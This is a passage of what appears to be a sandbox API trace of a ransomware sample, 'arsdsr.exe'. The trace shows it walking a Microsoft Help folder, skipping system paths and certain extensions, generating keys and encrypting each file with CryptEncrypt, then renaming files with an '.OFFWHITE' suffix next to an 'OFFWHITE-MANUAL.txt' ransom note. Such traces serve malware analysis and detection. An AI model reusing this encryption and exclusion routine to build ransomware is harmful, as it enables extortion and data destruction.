returned -1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.544] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.544] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.POWERPNT.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" [0147.544] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.544] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.544] PathFindExtensionW (pszPath="MS.POWERPNT.DEV.14.1033.hxn") returned=".hxn" [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.544] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.544] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.545] GetProcessHeap () returned 0x500000 [0147.545] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526c98 [0147.545] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.545] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=368) returned 1 [0147.545] GetProcessHeap () returned 0x500000 [0147.545] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.545] GetProcessHeap () returned 0x500000 [0147.545] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.545] GetProcessHeap () returned 0x500000 [0147.545] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.545] GetProcessHeap () returned 0x500000 [0147.545] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.545] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.545] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.545] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.545] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.545] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.545] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.545] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.545] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.546] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.546] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.546] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.546] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.546] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x170, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.546] SetLastError (dwErrCode=0x0) [0147.546] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.547] GetLastError () returned 0x0 [0147.547] GetLastError () returned 0x0 [0147.548] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x270, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.548] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.548] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.548] WriteFile (in: hFile=0xb0, lpBuffer=0x526c98*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526c98*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.548] GetProcessHeap () returned 0x500000 [0147.548] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x170) returned 0x52ebe8 [0147.548] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.548] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x170, lpOverlapped=0x0) returned 1 [0147.548] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.548] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x170, lpOverlapped=0x0) returned 1 [0147.548] GetProcessHeap () returned 0x500000 [0147.548] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.548] CloseHandle (hObject=0xb0) returned 1 [0147.548] GetProcessHeap () returned 0x500000 [0147.548] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.548] GetProcessHeap () returned 0x500000 [0147.548] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.548] GetProcessHeap () returned 0x500000 [0147.548] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.548] GetProcessHeap () returned 0x500000 [0147.549] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.549] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" [0147.549] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.OFFWHITE" [0147.549] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.offwhite")) returned 1 [0147.549] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.SETLANG.14.1033.hxn", cAlternateFileName="MSSETL~1.HXN")) returned 1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2=".") returned 1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="..") returned 1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="...") returned 1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="windows") returned -1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="rsa") returned -1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="programdata") returned -1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="appdata") returned 1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="program files") returned -1 [0147.549] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.550] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.550] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.SETLANG.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" [0147.550] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.550] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.550] PathFindExtensionW (pszPath="MS.SETLANG.14.1033.hxn") returned=".hxn" [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.550] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.550] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.550] GetProcessHeap () returned 0x500000 [0147.550] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526ca8 [0147.550] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.551] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=338) returned 1 [0147.551] GetProcessHeap () returned 0x500000 [0147.551] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.551] GetProcessHeap () returned 0x500000 [0147.551] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.551] GetProcessHeap () returned 0x500000 [0147.551] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.551] GetProcessHeap () returned 0x500000 [0147.551] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.551] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.551] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.551] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.551] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.551] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.551] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.551] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.551] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.551] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.551] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.551] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.551] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.552] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x152, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.552] SetLastError (dwErrCode=0x0) [0147.552] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.553] GetLastError () returned 0x0 [0147.553] GetLastError () returned 0x0 [0147.553] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x252, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.553] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.553] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.553] WriteFile (in: hFile=0xb0, lpBuffer=0x526ca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526ca8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.553] GetProcessHeap () returned 0x500000 [0147.553] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x152) returned 0x51d650 [0147.553] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.554] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x152, lpOverlapped=0x0) returned 1 [0147.554] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.554] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x152, lpOverlapped=0x0) returned 1 [0147.554] GetProcessHeap () returned 0x500000 [0147.554] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.554] CloseHandle (hObject=0xb0) returned 1 [0147.554] GetProcessHeap () returned 0x500000 [0147.554] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.554] GetProcessHeap () returned 0x500000 [0147.554] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.554] GetProcessHeap () returned 0x500000 [0147.554] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.554] GetProcessHeap () returned 0x500000 [0147.554] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.554] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" [0147.554] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.OFFWHITE" [0147.554] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn.offwhite")) returned 1 [0147.555] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5269fec0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.VISIO.14.1033.hxn", cAlternateFileName="MSVISI~1.HXN")) returned 1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2=".") returned 1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="..") returned 1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="...") returned 1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="windows") returned -1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="rsa") returned -1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="programdata") returned -1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="appdata") returned 1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="program files") returned -1 [0147.555] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.555] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.555] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.VISIO.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" [0147.555] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.555] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.555] PathFindExtensionW (pszPath="MS.VISIO.14.1033.hxn") returned=".hxn" [0147.555] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.556] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.556] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.556] GetProcessHeap () returned 0x500000 [0147.556] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526cb8 [0147.556] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.558] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=326) returned 1 [0147.558] GetProcessHeap () returned 0x500000 [0147.558] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.558] GetProcessHeap () returned 0x500000 [0147.558] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.558] GetProcessHeap () returned 0x500000 [0147.558] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.558] GetProcessHeap () returned 0x500000 [0147.558] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.558] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.558] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.558] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.558] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.558] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.558] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.558] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.558] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.558] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.559] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.559] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.559] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.559] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x146, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.559] SetLastError (dwErrCode=0x0) [0147.559] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.561] GetLastError () returned 0x0 [0147.561] GetLastError () returned 0x0 [0147.561] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x246, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.561] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.561] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x346, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.561] WriteFile (in: hFile=0xb0, lpBuffer=0x526cb8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526cb8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.561] GetProcessHeap () returned 0x500000 [0147.561] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x146) returned 0x51d650 [0147.561] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 